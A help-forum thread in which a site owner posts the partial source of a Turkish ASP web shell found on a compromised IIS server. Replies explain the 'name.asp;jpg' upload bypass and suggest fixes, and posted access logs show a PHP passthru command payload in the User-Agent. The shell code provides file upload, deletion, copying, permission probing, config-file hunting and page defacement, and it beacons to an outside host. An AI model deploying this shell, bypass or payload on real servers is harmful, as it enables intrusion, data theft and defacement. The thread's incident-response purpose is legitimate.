		Set lobjRs = Nothing
		ASCII2Bytes = lbinBuffer
	End Function

	Private Function Bytes2Unicode(ByRef pbinBytes)
		Dim lobjRs
		Dim llngLength
		Dim lstrBuffer
		llngLength = LenB(pbinBytes)
		Set lobjRs = Server.CreateObject("ADODB.Recordset")
    	Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
    	Call lobjRs.Open()
    	Call lobjRs.AddNew()
    	Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
    	Call lobjRs.Update()
    	lstrBuffer = lobjRs.Fields("BinaryData").Value
    	Call lobjRs.Close()
    	Set lobjRs = Nothing
		Bytes2Unicode = lstrBuffer
	End Function
End Class
Session("n2") = "ehir" 
'####################################
function addslash(path)
	if right(path,1)="\" then addslash=path else addslash=path & "\"
end function

sub Upload()
	dim objUpload,f,max,i,name,path,size,success
	
	set objUpload=New clsUpload

	targetPath=objUpload.Fields("folder").Value
	max=objUpload.Fields("max").Value

	for i=1 to max
		name=objUpload.Fields("file" & i).FileName
		size=objUpload.Fields("file" & i).Length
		if (name<>"") and (size>0) then
			gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
			path=addslash(targetPath) & name
			objUpload.Fields("file" & i).SaveAs path

			if objFSO.FileExists(path) then
				on error resume next
				set f=objFSO.GetFile(path)
				if IsObject(f) then
					if f.Size=size then success=true else success=false
				end if
				set f=nothing
			end if
			if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
		end if
	next
	response.Write gMsg
	set objUpload=nothing

end sub

if status="-4" then
	Upload()
'	hataKontrol
	popup=false
end if
'////////////////////////////////
sub hataKontrol
	if err<>0 then
		Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
	end if
end sub

sub araBul(path_,ara_)
	on error resume next
	If Len(path_) > 0 Then
		cur = path_&"\"
		If cur = "\\" Then cur = ""
			parent = ""
			If InStrRev(cur,"\") > 0 Then
			parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
		End If
	Else
		cur = ""
	End If
	
	Set f = objFSO.GetFolder(cur)

	Set fc = f.Files
	For Each f1 In fc
		if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
			downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
			if lcase(ara_)="mdb" then
				Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
			else 
				Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
			end if
		end if
	Next

	Set fs = f.SubFolders
	For Each f1 In fs
		araBul f1.path,ara_
	Next
	Set	f		= Nothing
	Set fc		= Nothing
	Set fs		= Nothing
end sub

sub sistemTest
	response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
	response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonuç</td></tr>"

	servu_Test
	WriteTestOnDriver
	WriteTestOnLocalPath
	LocalPathParentFolder
	LocalPathPParentFolder

	response.Write "</table>"
end sub

sub servu_Test
	dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
	for each drive_ in objFSO.Drives
		if drive_.Drivetype=2 or drive_.Drivetype=3 then 
			for each d_ in dosya_
				d_ = drive_.DriveLetter&":\"&d_
				if objFSO.FileExists(d_) then
					response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
				end if
			next
		end if
	next
end sub

function yaziyomu(yol)
	on error goto 0:on error resume next
	dim sonuc__
	Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
	MyFile.write "byzehir <zehirhacker@hotmail.com>"
	set MyFile = Nothing
	if err<>0 then 
		sonuc__="<font color=red>Yazma Hakký Yok!</font>"
	else 
		sonuc__="<font color=yellow>Yazma Hakký Var!</font>"
		on error goto 0: on error resume next
		objFSO.DeleteFile yol & "\test.zehir",true
		if err<>0 then 
			sonuc__=sonuc__&"<br><font color=red>Silme Hakký Yok!</font>"
		else
			sonuc__=sonuc__&"<br><font color=yellow>Silme Hakký Var!</font>"
		end if
	end if
	yaziyomu = sonuc__
end function

function yaziyomu2(yol)
	on error goto 0:on error resume next
	Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
	MyFile.write "byzehir <zehirhacker@hotmail.com>"
	set MyFile = Nothing
	if err<>0 then 
		yaziyomu2 = false
	else 
		objFSO.DeleteFile yol & "\test.zehir"
		yaziyomu2 = true
	end if
end function

sub WriteTestOnDriver
	for each drive_ in objFSO.Drives
		if drive_.Drivetype=2 or drive_.Drivetype=3 then 
			if not yaziyomu2(drive_.DriveLetter&":\") then
				Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
			else
				Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
			end if
		end if
	next
end sub

sub WriteTestOnLocalPath
	on error goto 0
	on error resume next
	if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
		Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
	else
		Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
	end if
end sub

sub LocalPathParentFolder
	on error goto 0
	on error resume next
	hed_ = request.servervariables("APPL_PHYSICAL_PATH")
	if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
	parhed_ = left(hed_,InStrRev(hed_,"\"))
	
	Set f = objFSO.GetFolder(parhed_)
	Set fc = f.SubFolders
	
	int_fol=0
	int_fil=0
	For Each f1 In fc
		int_fol=int_fol+1
	Next

	Set fc = f.files
	For Each f1 In fc
		int_fil=int_fil+1
	Next
	
	if err<>0 then
		Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Oluþtu : ["&err.Description&"]</td></tr>"
	else
		Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
	end if
end sub

sub LocalPathPParentFolder
	on error goto 0
	on error resume next
	hed_ = request.servervariables("APPL_PHYSICAL_PATH")
	if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
	hed_ = left(hed_,InStrRev(hed_,"\"))
	if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
	parhed_ = left(hed_,InStrRev(hed_,"\"))
	
	Set f = objFSO.GetFolder(parhed_)
	Set fc = f.SubFolders
	int_fol=0
	int_fil=0
	For Each f1 In fc
		int_fol=int_fol+1
	Next

	Set fc = f.files
	For Each f1 In fc
		int_fil=int_fil+1
	Next
	
	if err<>0 then
		if err=451 then
			Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data Üst Klasor Yok :)</td></tr>"
		else
			Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Oluþtu : ["&err.Description&"]</td></tr>"
		end if
	else
		Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
	end if
end sub

SELECT CASE status
CASE 13 'Sistem Bilgisi
	Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
	Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
	Response.Write "</table>"
	popup = false
CASE 14 'Upload and Search
	aramaUpload
	popup = false
	hataKontrol
CASE 15 'Ms. SQL Server
	Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
	Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server için connection string giriniz</td></tr><tr><td align=center>"
	Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
	Response.Write "<input style='width:250; height:21' value='' name=path><br>"
	response.Write "<input type=submit value='SQL Servera Baðlan' style='height:23;width:170' id=submit1 name=submit1>"
	Response.Write "</td></tr></table>"
	response.Write "</form>"

	popup = false
	hataKontrol
CASE 16 'file Copy window
	Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
	Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
	Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
	Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
	response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
	Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
	response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
	response.Write "<input type=radio name='islem' value='tasi'>Tasi"
	response.Write "</table>"
	response.Write "</form>"

	popup = false
	hataKontrol
CASE 17 'file Copy 
	isl = ""
	if islem="kopyala" then
		objFSO.CopyFile path,cf
		isl="kopyalandý.." 
	elseif islem="tasi" then
		objFSO.MoveFile path,cf
		isl="taþýndý.." 
	end if
	response.Write "Dosya "&isl
	response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
	response.Write "<br>"
	popup = false
	hataKontrol
CASE 18 'folder Copy window
	Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
	Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
	Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
	Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
	response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
	Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
	response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
	response.Write "<input type=radio name='islem' value='tasi'>Tasi"
	response.Write "</table>"
	response.Write "</form>"

	popup = false
	hataKontrol
CASE 19 'folder Copy 
	isl = ""
	if islem="kopyala" then
		objFSO.CopyFolder path,cf
		isl="kopyalandý.." 
	elseif islem="tasi" then
		objFSO.MoveFolder path,cf
		isl="taþýndý.." 
	end if
	response.Write "Klasor "&isl
	response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
	response.Write "<br>"
	popup = false
	hataKontrol
CASE 33 'Powered By
	response.Write "<body topmargin=5 leftmargin=0><center><h4>Powered by Zehir"
	response.Write "<br><br><font style='FONT-WEIGHT:normal' size=2>zehirhacker@hotmail.com<br><font color=yellow face='courier new'>küllü nefsun zaifetun mevt"
	popup = false
	hataKontrol
CASE 40 'Sistem Test
	sistemTest
	popup=false
CASE 50 'Siteleri Test Edelim :D
	%>
	<table width="100%" cellpadding=0 cellspacing=0>
		<tr>
			<td align=center>
				<b>Güvenlik Testi byZehir</b>
				<br>
				<form action="<%=dosyaPath%>" method=post id=frmMesaj>
					<input type=hidden name=kuskapani value=2>
					<table width=500 align=center border=1 cellpadding=0 cellspacing=0>
						<tr>
							<td width=100>Path</td>
							<td>
                            <input style="width:100%" type=text name="Path" id="Path" value="<%=path%>" size="20"></td>
						</tr>
						<tr>
							<td width=100>Sub Folder</td>
							<td>
                            <input style="width:100%" type=text name="SubFolder" id="SubFolder" value="www" size="20"></td>
						</tr>
						<tr>
							<td width=100>File Name</td>
							<td>
                            <input style="width:100%" type=text name="FileName" id="FileName" value="byzehir.txt" size="20"></td>
						</tr>
						<tr>
							<td colspan=2>
								<table width="100%" align=center>
									<tr>
										<td width="50%">
											<input type=checkbox name="dosya1" ID="Checkbox1" value="ON">index.htm<br>
											<input type=checkbox name="dosya2" ID="Checkbox2" value="ON">default.htm<br>
										</td>
										<td width="50%">
											<input type=checkbox name="dosya3" ID="Checkbox3" value="ON">index.asp<br>
											<input type=checkbox name="dosya4" ID="Checkbox4" value="ON">default.asp<br>
										</td>
									</tr>
								</table>
							</td>
						</tr>
						<tr>
							<td colspan=2 align=center>
								<a href="#" onClick="FormatText('cut')" alt="Kes">Kes</a>
								<a href="#" onClick="FormatText('copy')" alt="Kopyala">Kopyala</a>
								<a href="#" onClick="FormatText('paste')" alt="Yapýþtýr">Yapýþtýr</a>
								<a href="#" alt="Kalýn" onClick="FormatText('bold', '')">Bold</a>
								<a href="#" alt="Ýtalic" onClick="FormatText('italic', '')">Italic</a>
								<a href="#" alt="Altý Çizili" onClick="FormatText('underline', '')">UnderLine</a>
								<a href="#" onClick="FormatText('JustifyLeft', '')" alt="Sola Hizalý">JustifyLeft</a>
								<a href="#" alt="Ortada Hizalý" onClick="FormatText('JustifyCenter', '')">JustifyCenter</a>
								<a href="#" onClick="FormatText('JustifyRight', '')" alt="Saða Hizalý">JustifyRight</a>
								<a href="#" alt="Web Sitesi Linki Ekle" onClick="FormatText('createLink')">AddLink</a>
								<a href="#" alt="Resim Ekle" onClick="AddImage()">AddImage</a>
								<select name="selectColour" onChange="bgc(selectColour.options[selectColour.selectedIndex].value);" ID="selectColour">
                                  <option value="0" selected>-- Renk --</option>
                                  <option value="black">Siyah</option>
                                  <option value="white">Beyaz</option>
                                  <option value="blue">Mavi</option>
                                  <option value="red">Kýrmýzý</option>
                                  <option value="green">Yeþil</option>
                                  <option value="yellow">Sarý</option>
                                  <option value="orange">Turuncu</option>
                                  <option value="brown">Kahverengi</option>
                                  <option value="magenta">Pembe</option>
                                  <option value="cyan">Açýk Mavi</option>
                                  <option value="limegreen">Açýk Yeþil</option>
                                </select>
								<select name="a" onChange="FormatText('ForeColor', a.options[a.selectedIndex].value);" ID="a">
                                  <option value="0" selected>-- Renk --</option>
                                  <option value="black">Siyah</option>
                                  <option value="white">Beyaz</option>
                                  <option value="blue">Mavi</option>
                                  <option value="red">Kýrmýzý</option>
                                  <option value="green">Yeþil</option>
                                  <option value="yellow">Sarý</option>
                                  <option value="orange">Turuncu</option>
                                  <option value="brown">Kahverengi</option>
                                  <option value="magenta">Pembe</option>
                                  <option value="cyan">Açýk Mavi</option>
                                  <option value="limegreen">Açýk Yeþil</option>
                                </select>
                                <select name="selectSize" onChange="FormatText('fontsize', selectSize.options[selectSize.selectedIndex].value);">
                                  <option selected>-- Boyut --</option>
                                  <option value="1">1</option>
                                  <option value="2">2</option>
                                  <option value="3">3</option>
                                  <option value="4">4</option>
                                  <option value="5">5</option>
                                  <option value="6">6</option>
                                </select>
								<iframe width="100%" src="<%=dosyaPath%>?kuskapani=1" id="byZehir" name="<%=Session("n1")&Session("n2")%>"></iframe>
								<script language=javascript>
									frames.byZehir.document.designMode = "On";
									function bgc(option){
										frames.byZehir.document.body.bgColor=option;
									}
									function FormatText(command, option){
										frames.byZehir.focus();
  										frames.byZehir.document.execCommand(command, false, option);
  										frames.byZehir.focus();
									}
									function AddImage(){	
										imagePath = prompt('Eklemek istediðiniz resmin 
</td></tr></table>


</td></tr>
<p align="center"><font face="Wingdings"><a href="Coded by Loader"><img border="0" src="http://izocin.com/personal/size.php" width="90" height="60"></a></font></p>
</tr>
</table>

Open in new window

0
 
govindarajan78Commented:
do you have any file upload options in your website.
if yes then make it strict for certain file type only.

anyone can upload script file such as the above code.
0
 
govindarajan78Commented:
if you add any check in javascript for file uploads that may not be sufficient; the hacker might turnoff javascript and upload files
0
 
sitgAuthor Commented:
Thanks for your suggestion for secure site,
but I still try to find the finger print of hacker
0
 
SjoerdHCommented:
The above script is probebly uploaded as an jpg file something like:

evel.asp;jpg

Uploading this file IIS thinks it is a jpg file. After upload you open this fil ewith your browser. IIS scips al character asfter the ";" and it is seen as an asp script file. When the directory where the file is uploaded has script execute enabled then it will run and your server is wide open for the hacker.

Search for asp files which has been lately edited.

All above solutions has nothing to do with this. It is not firewall related. the fiel could be uploaded by FTP but probebly you have an other upload feature in 1 of the sites on your server.

Solution:

1: block uploads from files with strange characters like the semicolon ";" in the file name
2: more important remove execute rights for scripts from the upload directory.
0
 
sitgAuthor Commented:
Hi Sjoerdh,
Thanks for reply

I got the following entry on our websserver log, kindly check and suggest it will show how hacker hack the sites

2010-01-08 06:42:40 W3SVC239411494 server1 192.168.0.1 GET /Default.htm - 80 - 116.71.210.178 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 200 0 0 562
2010-01-08 06:42:40 W3SVC239411494 server1 192.168.0.1 GET /Default.htm - 80 - 116.71.210.178 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://test.com/ test.com 200 0 0 312
2010-01-08 06:42:41 W3SVC239411494 server1 192.168.0.1 GET /favicon.ico - 80 - 116.71.210.178 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 404 0 2 281
2010-01-08 06:42:44 W3SVC239411494 server1 192.168.0.1 GET /favicon.ico - 80 - 116.71.210.178 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 404 0 2 281
2010-01-09 03:58:10 W3SVC239411494 server1 192.168.0.1 GET /favicon.ico - 80 - 116.71.213.102 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 404 0 2 359
2010-01-09 03:58:12 W3SVC239411494 server1 192.168.0.1 GET /Default.asp - 80 - 116.71.213.102 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 200 0 0 734
2010-01-09 03:58:12 W3SVC239411494 server1 192.168.0.1 GET /favicon.ico - 80 - 116.71.213.102 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 404 0 2 359
2010-01-09 03:58:13 W3SVC239411494 server1 192.168.0.1 GET /style.css - 80 - 116.71.213.102 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://test.com/ test.com 200 0 0 546
2010-01-09 03:58:13 W3SVC239411494 server1 192.168.0.1 GET /swfobject.js - 80 - 116.71.213.102 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://test.com/ test.com 200 0 0 828
2010-01-09 04:01:09 W3SVC239411494 server1 192.168.0.1 GET /Default.asp - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 200 0 0 9609
2010-01-09 04:01:16 W3SVC239411494 server1 192.168.0.1 GET /default.aspx - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 500 0 0 687
2010-01-09 04:01:19 W3SVC239411494 server1 192.168.0.1 GET /homepage.swf - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://test.com/ test.com 200 0 64 9234
2010-01-09 04:01:23 W3SVC239411494 server1 192.168.0.1 GET /default.aspx - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 500 0 0 3359
2010-01-09 04:01:36 W3SVC239411494 server1 192.168.0.1 GET /Default.asp - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 200 0 0 10421
2010-01-09 04:03:06 W3SVC239411494 server1 192.168.0.1 GET /x.html - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 200 0 0 609
2010-01-09 04:03:07 W3SVC239411494 server1 192.168.0.1 GET /x.html - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://test.com/x.html test.com 200 0 0 328


Regards,
Naresh
0
 
SjoerdHCommented:
It is a small question but a very difficult answer.

The bottom line is that the hacker needs to find a place where he can write a file on your server, which after he can execute. What you see in your log is more or less a brute force method to find out what there is on your server and where there are possible vunnerable places.

Interesting reading can you find on:

http://www.bright-shadows.net/tutorials/tbs_wiwa.txt
http://www.enye-sec.org/en/papers/web_vuln-en.txt
0
 
sitgAuthor Commented:
Thanks sir,

Kindly check the following where he add the code on server.
the two hacker are working using differnet IP, they infected many website three time on the server,
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://test.com/x.html test.com 200 0 0 328
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

my server is still not stable, many times it's bandwirth goes more than 100 mbps and not able to restart any application not able to reset terminial session,
finally it required the hardboot,
Kindly suggest how i can get thier foot print which is still avilable on the server, any chance to remove the backdoor.

Warm regards,
Naresh


0
 
SjoerdHCommented:
Dear Naresh,

Do you have the complete above posted file? This one is not complete. Want to get a picture of what they can do on your server.
For a good picture how to solve this I need acces to your server.

Regards,
S
0
 
sitgAuthor Commented:
kindly give your email id
I can give you team viwer account

0
 
sitgAuthor Commented:
sorry  I can give you team viwer access
0
 
SjoerdHCommented:
We use Bomgar:

Go to support.exs.nl

and use this session key: RXH9696
0
 
sitgAuthor Commented:
in that case give me 1-2 working day time .
I am working to free this server asap

Naresh
0

Featured Post

Automating Your MSP Business

The road to profitability.
Delivering superior services is key to ensuring customer satisfaction and the consequent long-term relationships that enable MSPs to lock in predictable, recurring revenue. What's the best way to deliver superior service? One word: automation.

  • 8
  • 4
  • 4
  • +1
Tackle projects and never again get stuck behind a technical roadblock.
Join Now